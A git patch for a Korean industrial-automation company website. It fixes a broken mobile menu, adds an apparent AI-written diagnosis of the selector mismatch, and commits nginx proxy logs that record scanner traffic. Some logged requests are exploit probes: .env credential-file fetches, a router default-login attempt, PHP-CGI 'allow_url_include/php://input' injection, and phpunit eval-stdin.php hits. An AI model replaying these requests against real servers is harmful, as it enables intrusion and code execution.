From e33d42bd7e899eb92cc0ee3f045456c042064be9 Mon Sep 17 00:00:00 2001 From: Wind Date: Thu, 19 Feb 2026 07:52:07 +0900 Subject: [PATCH] =?UTF-8?q?=EB=AA=A8=EB=B0=94=EC=9D=BC=20=EB=A9=94?= =?UTF-8?q?=EB=89=B4=20=EC=82=AC=EB=9D=BC=EC=A7=90=20=ED=95=B4=EA=B2=B0?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- html/assets/images/icons/icons.svg | 6 +- html/assets/js/i18n.js | 8 +- html/assets/js/script.js | 20 +- html/assets/js/모바일메뉴 사라짐.md | 198 + html/index.html | 13 +- html/status.json | 2 +- npm/data/logs/fallback_http_access.log | 930 + npm/data/logs/fallback_http_error.log | 425 + npm/data/logs/proxy-host-1_access.log | 1936 ++ npm/data/logs/proxy-host-1_error.log | 241 + npm/data/logs/proxy-host-2_access.log | 168 + npm/data/logs/proxy-host-2_error.log | 2 + npm/data/logs/proxy-host-3_access.log | 142 + npm/data/logs/proxy-host-3_error.log | 41 + npm/data/logs/proxy-host-4_access.log | 42480 +++++++++++++++++++++++ npm/data/logs/proxy-host-4_error.log | 420 + 16 files changed, 47016 insertions(+), 16 deletions(-) create mode 100644 html/assets/js/모바일메뉴 사라짐.md diff --git a/html/assets/images/icons/icons.svg b/html/assets/images/icons/icons.svg index 627cc33..8c1750a 100644 --- a/html/assets/images/icons/icons.svg +++ b/html/assets/images/icons/icons.svg @@ -35,17 +35,17 @@ - + - - { // ============================================================ // 메뉴 토글 // ============================================================ - const menuBtn = document.querySelector('.menu-btn'); - const navMenu = document.querySelector('.nav-menu'); + const menuBtn = document.querySelector('#mobile-menu-btn'); + const navMenu = document.querySelector('#mobile-menu'); + const closeBtn = document.querySelector('#close-menu-btn'); if (menuBtn && navMenu) { + // 메뉴열기 menuBtn.addEventListener('click', () => { - navMenu.classList.toggle('open'); + navMenu.classList.remove('translate-x-full'); menuBtn.classList.toggle('open'); }); + //메뉴닫기 + if (closeBtn) { + closeBtn.addEventListener('click', () => { + navMenu.classList.add('translate-x-full'); + }); + } + //메뉴 링크 클릭 시 닫기 + navMenu.querySelectorAll('a').forEach(link => { + link.addEventListener('click',() => { + navMenu.classList.add('translate-x-full'); + }); + }); } // ============================================================ diff --git a/html/assets/js/모바일메뉴 사라짐.md b/html/assets/js/모바일메뉴 사라짐.md new file mode 100644 index 0000000..cc5adce --- /dev/null +++ b/html/assets/js/모바일메뉴 사라짐.md @@ -0,0 +1,198 @@ +모바일 메뉴가 동작하지 않는 문제를 찾았습니다! 🔍 +🔴 문제점 발견 +1. 클래스명 불일치 (가장 큰 문제!) +script.js: +javascriptconst menuBtn = document.querySelector('.menu-btn'); // ❌ .menu-btn +const navMenu = document.querySelector('.nav-menu'); // ❌ .nav-menu +index.html: +html + +
+ +
+→ .menu-btn과 .nav-menu 클래스가 HTML에 없습니다! + +2. 닫기 버튼도 작동 안 함 +script.js: +javascriptdocument.querySelectorAll('.modal .close-btn').forEach(btn => { + // ❌ .close-btn 클래스를 찾지만... +}); +index.html: +html + + +3. 이벤트 핸들러 중복 +script.js 하단: +javascript// 메뉴 토글 코드가 있는데... +const menuBtn = document.querySelector('.menu-btn'); +index.html 하단: +html + +📋 문제 요약 +요소script.js에서 찾는 것index.html 실제메뉴 버튼.menu-btn#mobile-menu-btn (클래스 없음)메뉴.nav-menu#mobile-menu (클래스 없음)닫기 버튼.modal .close-btn#close-menu-btn (클래스 없음) + +✅ 해결 방법 (3가지 옵션) +옵션 1: script.js 수정 (권장) +ID로 찾도록 변경: +javascriptconst menuBtn = document.querySelector('#mobile-menu-btn'); // ID로 변경 +const navMenu = document.querySelector('#mobile-menu'); // ID로 변경 +옵션 2: index.html 수정 +클래스 추가: +html - @@ -166,7 +169,7 @@
-
+

Process Automation

Batch Process Control

Not only precision control, but also production planning,process data & historical lot management, you can get it by our Batch Manager software.

@@ -291,14 +294,14 @@
-
+

Control Valves

Smart positioners with HART communication

Komoto (Motoyama Korea)
Azbil
Honeywell
-
+

Shutoff Valves

Accelerometers and velocity sensors for predictive maintenance

Automa
Proval
Flowserve
diff --git a/html/status.json b/html/status.json index 88bb0cf..db24949 100644 --- a/html/status.json +++ b/html/status.json @@ -1 +1 @@ -{"cpu_temp": "39", "nvme_temp": "34", "uptime_days": 5, "last_update": "09:22:01"} \ No newline at end of file +{"cpu_temp": "40", "nvme_temp": "33", "uptime_days": 6, "last_update": "07:51:01"} \ No newline at end of file diff --git a/npm/data/logs/fallback_http_access.log b/npm/data/logs/fallback_http_access.log index d27cca0..debb7a4 100644 --- a/npm/data/logs/fallback_http_access.log +++ b/npm/data/logs/fallback_http_access.log @@ -872,3 +872,933 @@ [17/Feb/2026:02:27:55 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" [17/Feb/2026:02:27:57 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" [17/Feb/2026:02:30:07 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:02:35:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 49.51.183.15] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[17/Feb/2026:02:35:50 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[17/Feb/2026:02:46:37 +0000] 400 - GET http 222.117.41.51 "/" [Client 118.26.37.105] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[17/Feb/2026:02:46:39 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 118.26.37.105] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[17/Feb/2026:02:46:41 +0000] 400 - GET http 222.117.41.51 "/robots.txt" [Client 118.26.37.105] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[17/Feb/2026:02:46:43 +0000] 400 - GET http 222.117.41.51 "/sitemap.xml" [Client 118.26.37.105] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[17/Feb/2026:02:55:33 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:02:56:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:03:09:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[17/Feb/2026:03:14:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:03:20:14 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:03:30:16 +0000] 400 - GET http 222.117.41.51 "/" [Client 167.94.146.56] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Feb/2026:03:30:17 +0000] 400 - - http localhost "-" [Client 167.94.146.56] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:03:30:22 +0000] 400 - GET http 222.117.41.51 "/sitemap.xml" [Client 167.94.146.56] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Feb/2026:03:35:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.196] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:03:35:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.196] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:03:37:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[17/Feb/2026:03:40:10 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" +[17/Feb/2026:03:40:10 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" +[17/Feb/2026:03:40:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:03:40:11 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" +[17/Feb/2026:03:40:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:03:40:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:03:40:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:03:40:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:03:40:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:03:40:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:03:40:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.170.172.128] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[17/Feb/2026:03:40:49 +0000] 405 - POST http 222.117.41.51 "/" [Client 195.170.172.128] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[17/Feb/2026:03:40:50 +0000] 405 - POST http 222.117.41.51 "/" [Client 195.170.172.128] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[17/Feb/2026:03:40:50 +0000] 404 - GET http 222.117.41.51 "/WuEL" [Client 195.170.172.128] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)" "-" +[17/Feb/2026:03:40:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:03:40:51 +0000] 404 - GET http 222.117.41.51 "/a" [Client 195.170.172.128] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[17/Feb/2026:03:40:52 +0000] 404 - GET http 222.117.41.51 "/download/file.ext" [Client 195.170.172.128] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[17/Feb/2026:03:40:53 +0000] 404 - GET http 222.117.41.51 "/SiteLoader" [Client 195.170.172.128] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[17/Feb/2026:03:40:53 +0000] 404 - GET http 222.117.41.51 "/mPlayer" [Client 195.170.172.128] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[17/Feb/2026:03:40:54 +0000] 405 - POST http 222.117.41.51 "/" [Client 195.170.172.128] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[17/Feb/2026:03:40:55 +0000] 400 - GET http 222.117.41.51 "/" [Client 195.170.172.128] [Length 632] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[17/Feb/2026:03:43:50 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:03:51:11 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:04:09:37 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:04:11:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:04:34:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:04:41:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 54.196.222.60] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[17/Feb/2026:04:45:35 +0000] 400 - GET http 222.117.41.51 "/version" [Client 101.36.108.184] [Length 252] [Gzip -] "-" "-" +[17/Feb/2026:04:45:35 +0000] 400 - GET http 222.117.41.51 "/" [Client 101.36.108.184] [Length 252] [Gzip -] "-" "-" +[17/Feb/2026:04:45:35 +0000] 400 - GET http 222.117.41.51 "/" [Client 101.36.108.184] [Length 252] [Gzip -] "-" "-" +[17/Feb/2026:04:45:35 +0000] 400 - GET http 222.117.41.51 "/v1" [Client 101.36.108.184] [Length 252] [Gzip -] "-" "-" +[17/Feb/2026:04:45:36 +0000] 400 - - http localhost "-" [Client 101.36.108.184] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:04:45:36 +0000] 400 - - http localhost "-" [Client 101.36.108.184] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:04:45:39 +0000] 400 - GET http 222.117.41.51 "/" [Client 101.36.108.184] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[17/Feb/2026:04:45:40 +0000] 400 - GET http 222.117.41.51 "/" [Client 45.142.154.64] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[17/Feb/2026:04:45:41 +0000] 400 - GET http 222.117.41.51 "/" [Client 45.142.154.65] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[17/Feb/2026:04:53:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 167.94.138.201] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Feb/2026:04:53:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.201] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:04:53:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.201] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:04:53:32 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Feb/2026:04:53:36 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:04:53:47 +0000] 404 - GET http 222.117.41.51 "/login" [Client 167.94.138.201] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Feb/2026:04:53:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.201] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:05:03:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:05:11:42 +0000] 404 - GET http 222.117.41.51 "/actuator/health" [Client 20.65.193.129] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[17/Feb/2026:05:20:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 24.144.102.19] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[17/Feb/2026:05:20:51 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:05:25:47 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[17/Feb/2026:05:26:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:05:30:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 198.235.24.207] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[17/Feb/2026:05:34:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[17/Feb/2026:05:48:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:05:51:14 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:06:06:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.94.31.224] [Length 0] [Gzip -] "-" "-" +[17/Feb/2026:06:15:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:06:18:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:06:33:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[17/Feb/2026:06:36:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 184.105.247.195] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" "-" +[17/Feb/2026:06:37:50 +0000] 404 - GET http 222.117.41.51 "/webui/" [Client 184.105.247.195] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0" "-" +[17/Feb/2026:06:39:24 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Feb/2026:06:40:28 +0000] 404 - GET http 222.117.41.51 "/geoserver/web/" [Client 184.105.247.195] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" "-" +[17/Feb/2026:06:40:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:06:43:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:06:46:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.156.129.132] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[17/Feb/2026:06:54:06 +0000] 400 - GET http 222.117.41.51 "/" [Client 18.218.118.203] [Length 654] [Gzip -] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[17/Feb/2026:06:54:12 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=user&psd=user" [Client 124.29.214.186] [Length 150] [Gzip -] "-" "-" +[17/Feb/2026:06:54:12 +0000] 400 - - http localhost "-" [Client 18.218.118.203] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:06:54:16 +0000] 400 - GET http 222.117.41.51 "/" [Client 18.218.118.203] [Length 654] [Gzip -] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[17/Feb/2026:06:59:27 +0000] 400 - - http localhost "-" [Client 18.218.118.203] [Length 0] [Gzip -] "-" "-" +[17/Feb/2026:06:59:58 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 165.154.227.13] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:06:59:59 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 165.154.227.13] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:07:00:00 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:00 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 165.154.227.13] [Length 154] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:01 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:01 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:02 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:02 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:03 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:04 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:05 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:05 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:06 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:07 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:07 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:08 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:08 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:08 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:09 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:09 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:10 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:07:00:10 +0000] 404 - GET http 